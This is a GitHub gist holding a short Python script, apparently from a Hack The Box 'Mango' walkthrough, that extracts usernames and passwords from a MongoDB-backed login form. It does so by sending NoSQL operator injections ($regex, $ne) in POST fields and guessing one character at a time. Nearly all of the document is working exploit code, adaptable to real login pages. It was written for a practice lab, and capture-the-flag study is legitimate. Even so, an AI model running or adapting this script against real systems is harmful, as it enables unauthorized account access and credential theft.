Created
April 24, 2020 17:14
-
-
Save joeminicucci/cf592ab30512872c5b19ea4e200532e4 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #ippsec's Mango HTB mongo DB brute force script | |
| import requests | |
| def inject(data): | |
| r = requests.post('http://staging-order.mango.htb/', data=data, allow_redirects=False) | |
| if r.status_code != 200: | |
| return True | |
| #can add prefixes to secret to pretext where the brute-force begins | |
| secret = "" | |
| payload = "" | |
| while True: | |
| data = { "username[$regex]":"^" + payload + "$", "password[$ne]":"SomeGuess", "otherPOSTField":"someValue"} | |
| if inject(data): | |
| break | |
| for i in range(32,127): | |
| #regex special characters | |
| if chr(i) in ['.', '?', '*', '^', '+', '|']: | |
| payload = secret + "\\" + chr(i) | |
| else: | |
| payload = secret + chr(i) | |
| print("\r" + payload, flush=False, end='') | |
| #change this username manually after the above UN brute-force returns user | |
| data = {"username": "admin", "password[$regex]":"^"+payload, "otherPOSTField":"someValue"} | |
| if inject(data): | |
| print("\r" + payload, flush=True, end='') | |
| secret = secret + chr(i) | |
| break | |
| print() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment